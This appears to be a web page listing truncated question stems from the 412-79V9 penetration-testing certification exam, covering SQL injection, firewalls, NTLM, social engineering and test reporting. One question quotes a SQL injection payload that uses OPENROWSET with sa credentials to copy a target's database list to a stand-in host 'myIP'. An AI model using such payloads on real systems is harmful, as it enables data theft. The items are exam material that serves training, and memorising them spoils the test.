412-79V9 Exam Questions

Hackers today have an ever-increasing list of weaknesses in the web application structure at their disposal, which they can exploit to accomplish a wide variety of malicious tasks....

What sort of vulnerability assessment approach starts by building an inventory of protocols found on the machine?

During the process of fingerprinting a web application environment, what do you need to do in order to analyze HTTP and HTTPS request headers and the HTML source code?

Identify the correct formula for Return on Investment (ROI).

Identify the type of firewall represented in the diagram below:

Due to illegal inputs, various types of TCP stacks respond in a different manner. Some IDSs do not take into account the TCP protocol's urgency feature, which could allow testers t...

Identify the person who will lead the penetration-testing project and be the client point of contact.

A man enters a PIN number at an ATM machine, being unaware that the person next to him was watching. Which of the following social engineering techniques refers to this type of inf...

What is the biggest source of data leaks in organizations today?

You have compromised a lower-level administrator account on an Active Directory network of a small company in Dallas, Texas. You discover Domain Controllers through enumeration. Yo...

Which of the following pen testing reports provides detailed information about all the tasks performed during penetration testing?

Choose the correct option to define the Prefix Length.

Which of the following attacks is an offline attack?

How many bits is a acknowledgement number?

Which of the following protocol's traffic is captured by using the filter tcp.port==3389 in the Wireshark tool?

In the process of hacking a web application, attackers manipulate the HTTP requests to subvert the application authorization schemes by modifying input fields that relate to the us...

The amount of data stored in organizational databases has increased rapidly in recent years due to the rapid advancement of information technologies. A high percentage of these dat...

Which of the following scan option is able to identify the SSL services?

If a web application sends HTTP cookies as its method for transmitting session tokens, it may be vulnerable which of the following attacks?

SQL injection attack consists of insertion or "injection" of either a partial or complete SQL query via the data input or transmitted from the client (browser) to the web applicati...

Which of the following is NOT generally included in a quote for penetration testing services?

Traceroute is a computer network diagnostic tool for displaying the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network. It sends a sequen...

Which of the following attributes has a LM and NTLMv1 value as 64bit + 64bit + 64bit and NTLMv2 value as 128 bits?

Which of the following password hashing algorithms is used in the NTLMv2 authentication mechanism?

Identify the attack represented in the diagram below:

Which of the following is developed to address security concerns on time and reduce the misuse or threat of attacks in an organization?

Which of the following equipment could a pen tester use to perform shoulder surfing?

The term social engineering is used to describe the various tricks used to fool people (employees, business partners, or customers) into voluntarily giving away information that wo...

Which of the following acts is a proprietary information security standard for organizations that handle cardholder information for the major debit, credit, prepaid, e-purse, ATM,...

Which among the following information is not furnished by the Rules of Engagement (ROE) document?

An attacker injects malicious query strings in user input fields to bypass web service authentication mechanisms and to access back-end databases. Which of the following attacks is...

Identify the type of authentication mechanism represented below:

Packet filtering firewalls are usually a part of a router. In a packet filtering firewall, each packet is compared to a set of criteria before it is forwarded. Depending on the pac...

By default, the TFTP server listens on UDP port 69. Which of the following utility reports the port status of target TCP and UDP ports on a local or a remote computer and is used t...

Vulnerability assessment is an examination of the ability of a system or application, including current security vulnerabilities and controls, to withstand assault. It recognizes,...

Which of the following methods is used to perform server discovery?

In the example of a /etc/passwd file below, what does the bold letter string indicate? nomad:hRLNrZ3vS3TFZ:501:100: Simple Nomad:/home/nomad:/bin/bash

Which of the following policy forbids everything with strict restrictions on all usage of the company systems and network?

In the TCP/IP model, the transport layer is responsible for reliability and flow control from source to the destination. TCP provides the mechanism for flow control by allowing the...

Which of the following external pen testing tests reveals information on price, usernames and passwords, sessions, URL characters, special instructors, encryption used, and web pag...

OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN,Address=myIP,80;','select * from mydatabase.hacked_sysdatabases') select * from master.dbo.sysdatabases - The query he us...

You are conducting a penetration test against a company and you would like to know a personal email address of John, a crucial employee. What is the fastest, cheapest way to find o...

A Blind SQL injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the application response. This attack is o...

Which of the following is an ARP cache poisoning technique aimed at network switches?

Which of the following documents helps in creating a confidential relationship between the pen tester and client to protect critical and confidential information or trade secrets?

TCP/IP model is a framework for the Internet Protocol suite of computer network protocols that defines the communication in an IP-based network. It provides end-to-end connectivity...

Amazon, an IT based company, conducts a survey on the usage of the Internet. They found that company employees spend most of the time at work surfing the web for their personal use...

Internet Control Message Protocol (ICMP) messages occur in many situations, such as whenever a datagram cannot reach the destination or the gateway does not have the buffering capa...

To locate the firewall, SYN packet is crafted using Hping or any other packet crafter and sent to the firewall. If ICMP unreachable type 13 message (which is an admin prohibited pa...

An automated electronic mail message from a mail system which indicates that the user does not exist on that server is called as?